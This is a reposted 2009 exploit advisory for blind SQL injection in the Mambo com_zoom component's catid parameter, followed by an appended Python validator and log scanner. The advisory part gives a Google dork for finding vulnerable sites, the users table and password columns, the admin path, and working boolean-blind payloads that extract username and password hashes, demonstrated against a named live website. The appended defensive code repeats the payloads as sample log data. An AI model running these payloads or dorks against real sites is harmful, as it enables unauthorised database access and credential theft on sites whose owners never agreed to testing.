The Mambo Zoom component remote blind SQL injection vulnerability

2009.09.11
Credit: boom3rang
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Mambo component com_zoom (catid) Blind SQL injection

[ASCII-art banner reading "KHG-CREW 2009"; original layout not recoverable]

Red n' black I dress, eagle on my chest. It's good to be an ALBANIAN.
Keep my head up high, for that flag I die. I'm proud to be an ALBANIAN.

###################################################################
Author  : boom3rang
Contact : boom3rang[at]live.com
Greetz  : H!tm@N - KHG - cHs
R.I.P redc00de
-------------------------------------------------------------------
Affected software description

<name>zoom</name>
<creationDate>20/01/2004</creationDate>
<author>Mike de Boer</author>
<authorEmail>mailme@mikedeboer.nl</authorEmail>
<authorUrl>www.mikedeboer.nl</authorUrl>
<version>2.0</version>
-------------------------------------------------------------------
[~] SQLi : http://www.TARGET.com/index.php?option=com_zoom&Itemid=0&catid=[SQLi]

[~] Google Dork : inurl:com_zoom inurl:"imgid"
-------------------------------------------------------------------
[~] Table_NAME  = mos_users
[~] Column_NAME = username - password
-------------------------------------------------------------------
[~] Admin Path : http://www.TARGET.com/administrator
===================================================================
= POC =
===================================================================
[~] Live Demo:

ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/* --> True
ttp://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/* --> False
-------------------------------------------------------------------
[~] ASCII

index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96
-------------------------------------------------------------------
[~] Live Demo ASCII

True
http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>96

False
http://www.sandervalkema.com/index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/ascii(substring((SELECT/**/concat(username,0x3a,password)/**/from/**/mos_users limit 0,1),1,1))>97

As we see, the first character of the username is 'a': char(97)=a.
Now you can change the second limit to find the other characters. Good Luck...

note:
<name>zoom</name>
<creationDate>20/01/2004</creationDate>
<author>Mike de Boer</author>
<authorEmail>mailme@mikedeboer.nl</authorEmail>
<authorUrl>www.mikedeboer.nl</authorUrl>
<version>2.0</version>
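The advisory's technique rests on two things a defender can act on: the `catid` parameter reaches a query without being constrained to an integer, and a boolean-blind probe leaves a recognisable trail in the access log (the same source sending `catid` values that are not integers, with `/**/` used as whitespace and responses that split into two body sizes for the true and false cases). The following Python script is an added example, not code from the advisory, from cxsecurity.com or from the Mambo/com_zoom project. It shows the strict integer check the component should apply to `catid` before any query, and a log scanner that normalises the parameter (URL-decoding, stripping the `/**/` comments) and flags the probe pattern. All log lines are constructed samples in Apache combined format, and the function names (`is_valid_catid`, `classify_catid`, `scan_log`, `blind_oracle_suspects`) are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines (not real traffic). The catid values
# mirror the payload shapes quoted in the advisory, once plain and once
# URL-encoded, as a web server would log them.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Sep/2009:10:00:01 +0000] "GET /index.php?option=com_zoom&Itemid=0&catid=21 HTTP/1.1" 200 5120
203.0.113.5 - - [11/Sep/2009:10:00:02 +0000] "GET /index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=1/* HTTP/1.1" 200 5120
203.0.113.5 - - [11/Sep/2009:10:00:03 +0000] "GET /index.php?option=com_zoom&Itemid=0&catid=21/**/and/**/1=2/* HTTP/1.1" 200 2048
203.0.113.5 - - [11/Sep/2009:10:00:04 +0000] "GET /index.php?option=com_zoom&Itemid=0&catid=21%2F%2A%2A%2Fand%2F%2A%2A%2Fascii(substring((SELECT%2F%2A%2A%2Fconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users+limit+0,1),1,1))%3E96 HTTP/1.1" 200 5120
198.51.100.7 - - [11/Sep/2009:10:00:05 +0000] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 7000
"""

# Apache combined log line: source IP, timestamp, request target, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# /* ... */ comments, including an unterminated trailing /* used to cut off
# the rest of the original query.
COMMENT_RE = re.compile(r"/\*.*?\*/|/\*.*$", re.S)
# "and 1=1" / "and 1=2" style boolean conditions appended to a numeric id.
BOOLEAN_PROBE_RE = re.compile(r"\b(and|or)\s+\S+\s*(=|<>|!=|<|>)\s*\S+")
# SQL functions and keywords that never belong in a category id.
KEYWORD_RE = re.compile(r"\b(select|union|substring|ascii|concat|sleep|benchmark)\b")


def is_valid_catid(raw: str) -> bool:
    """The mitigation the component needs: catid must be a plain integer.
    Anything else is rejected before it can reach a query string."""
    return re.fullmatch(r"[0-9]{1,10}", raw) is not None


def normalize(value: str) -> str:
    """Canonicalise a query value the way the database would read it:
    decode once more (tolerates double encoding), replace /**/ comments with
    spaces, collapse whitespace, lowercase."""
    text = unquote_plus(value)
    text = COMMENT_RE.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip().lower()


def classify_catid(raw: str) -> str:
    """'clean' for a plain integer, 'sqli_probe' when SQL structure shows
    through after normalisation, otherwise 'malformed'."""
    if is_valid_catid(raw):
        return "clean"
    norm = normalize(raw)
    if BOOLEAN_PROBE_RE.search(norm) or KEYWORD_RE.search(norm):
        return "sqli_probe"
    return "malformed"


def scan_log(text: str) -> list:
    """One alert per request whose catid is not a plain integer."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for raw in params.get("catid", []):
            verdict = classify_catid(raw)
            if verdict != "clean":
                alerts.append({"ip": m["ip"], "ts": m["ts"], "verdict": verdict,
                               "status": m["status"], "size": m["size"],
                               "payload": normalize(raw)})
    return alerts


def blind_oracle_suspects(alerts: list, min_probes: int = 2) -> dict:
    """Boolean-blind extraction shows up as repeated sqli_probe requests from
    one source whose responses fall into at least two distinct body sizes
    (the true/false oracle). Returns {ip: sorted distinct sizes}."""
    by_ip = {}
    for a in alerts:
        if a["verdict"] == "sqli_probe":
            by_ip.setdefault(a["ip"], []).append(a["size"])
    return {ip: sorted(set(sizes)) for ip, sizes in by_ip.items()
            if len(sizes) >= min_probes and len(set(sizes)) >= 2}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(a["ts"], a["ip"], a["verdict"], a["status"], a["size"], a["payload"])
    print("blind-oracle suspects:", blind_oracle_suspects(found))
```

The integer check is the actual fix for the class of bug the advisory describes: a category id cast or validated as an integer cannot carry `and`, `ascii(` or a comment, so the true/false oracle never exists. The scanner is for the period before the patch lands, and its size-split heuristic is deliberately coarse; on a real site, tune `min_probes` and feed it the full log rather than the five constructed lines.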


Copyright 2024, cxsecurity.com